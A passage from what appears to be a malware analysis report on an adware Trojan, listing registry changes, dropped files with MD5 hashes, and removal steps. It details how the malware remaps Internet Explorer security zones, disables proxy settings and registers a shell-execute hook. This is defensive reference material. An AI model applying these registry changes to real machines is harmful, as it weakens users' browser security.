[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 E7 BD DE 37 05 62 21 75 1D 10 ED 9E EE 5C 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\WindowsUpdater]
"Count" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 90 2A D3 C3 DA 40 D1 96 CF C3 8E E2 8A E1 92"
[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"(Default)" = "%Documents and Settings%\%current user%\Cookies\matile.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"EnableShellExecuteHooks" = "1"
[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"ThreadingModel" = "Apartment"
The process amisetup7604__99999_il2.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"tmnqck.exe" = "tmnqck"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nop.exe" = "nop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 8A 9E ED 93 07 C3 00 70 7D EF EB 1E 0F 52 F9"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Programmable]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
[HKCR\telexes.compiles.1]
[HKCR\telexes.compiles]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
[HKCR\telexes.compiles\CurVer]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
[HKCR\telexes.compiles.1\CLSID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"
The process rundll32.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C C3 DC 4C 77 F6 82 71 E0 B9 1E 22 B4 58 77 BB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}]
"DisplayName" = "hohosearch - Uninstall"
"UninstallString" = "rundll32.exe %Program Files%\Atidogrudck\atdagent.dll,u /k={0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}"
The process tmnqck.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\Microsoft.Ptid.Host.List]
"List" = "aG9ob3NlYXJjaA=="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\tmnqck\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 B3 46 D4 4C EF 3F 6A 85 C6 0F 5F 8B F7 DE 04"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Local Settings\ms-ptid-key]
"(Default)" = "{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\Local Settings\ms-ptid-key]
"{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}" = "17 2C 2F 65 07 8A 52 5F 94 93 8B 96 96 DC 61 77"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\tmnqck\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process chcUpdateTsk.html5:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 06 A8 5A 99 11 B7 29 09 8C 10 84 FA 67 08 4D"
Dropped PE files
| MD5 | File path |
|---|---|
| b80fc4706b18a05446598a2dce6c57a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp.exe |
| 84b3683a4ecca8a183ea5e8219934a05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7548__10235_il2.exe |
| 84b3683a4ecca8a183ea5e8219934a05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7604__99999_il2.exe |
| 9baa6c3392dc9c0ad1733882a3faf2ba | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\awh6.tmp |
| 1fa9fe66c4c62c9fbb152972e8662e20 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\prepreinstaller_win.exe |
| 54359f8ab1edeba9bf9f1f54346ec7d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmnqck.exe |
| 1fa9fe66c4c62c9fbb152972e8662e20 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe |
| b80fc4706b18a05446598a2dce6c57a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe |
| 53107ede3553b72f6eda0778e5fc4319 | c:\Program Files\Atidogrudck\atdagent.dll |
| 5477005b383d549d0cf4d8fc761a27c0 | c:\Program Files\Chocosyledusy\chcUpdateSrv.html5 |
| 1dce88ae76d5372a1e0da7a42aaff80e | c:\Program Files\Chocosyledusy\chcUpdateTsk.html5 |
| 4eb83fc544baae895b2f0bf2730e13d5 | c:\Program Files\Coabuied\DeElevator.dll |
| 629b6671ced1f1992d0f331b0dc97862 | c:\Program Files\Coabuied\ckehack.html5 |
| fdf352824c5caf92cc16abd2c2d84145 | c:\Program Files\Coabuied\matile.dll |
| 564799253de378dd915f98c4c16e8055 | c:\Program Files\Coabuied\wihoy.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)
%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
